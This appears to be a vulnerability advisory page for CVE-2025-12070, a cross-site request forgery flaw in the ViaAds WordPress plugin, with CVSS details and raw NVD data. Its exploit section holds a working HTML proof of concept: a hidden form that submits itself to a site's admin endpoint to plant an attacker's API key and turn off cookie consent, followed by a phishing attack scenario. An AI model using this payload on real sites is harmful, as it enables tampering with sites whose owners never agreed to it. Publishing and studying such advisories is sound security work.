Security Vulnerability Report
中文
CVE-2025-12070 CVSS 4.3 MEDIUM

CVE-2025-12070

Published: 2025-11-04 04:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The ViaAds plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.2. This is due to missing nonce validation on the `ViaAds_pluginHandler` function. This makes it possible for unauthenticated attackers to modify the plugin's API key and cookie consent settings via a forged request granted they can trick an administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ViaAds WordPress插件 <= 2.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-12070 - ViaAds Plugin Settings Modification --> <!-- This PoC demonstrates how an attacker can modify ViaAds plugin settings --> <!-- by tricking an admin into visiting this page --> <html> <body> <h2>CVE-2025-12070 CSRF PoC</h2> <p>ViaAds Plugin API Key Modification</p> <form id="csrfForm" action="http://target-wordpress-site/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="action" value="ViaAds_pluginHandler" /> <input type="hidden" name="apikey" value="attacker-controlled-api-key" /> <input type="hidden" name="cookieconsent" value="0" /> <input type="hidden" name="submit" value="Save" /> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> </body> </html> <!-- Attack Scenario: --> <!-- 1. Attacker creates malicious page with above PoC --> <!-- 2. Attacker sends link to WordPress admin via phishing email --> <!-- 3. Admin clicks link while logged into WordPress --> <!-- 4. Browser sends authenticated request with modified settings --> <!-- 5. ViaAds plugin accepts request without nonce validation --> <!-- 6. Attacker's API key is now configured in the plugin -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12070", "sourceIdentifier": "[email protected]", "published": "2025-11-04T04:15:37.433", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ViaAds plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.2. This is due to missing nonce validation on the `ViaAds_pluginHandler` function. This makes it possible for unauthenticated attackers to modify the plugin's API key and cookie consent settings via a forged request granted they can trick an administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/viaads/tags/2.1.1/apikey.php#L81", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3395777/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/00f65117-e8f7-41d8-bdf4-c1fab03e4792?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.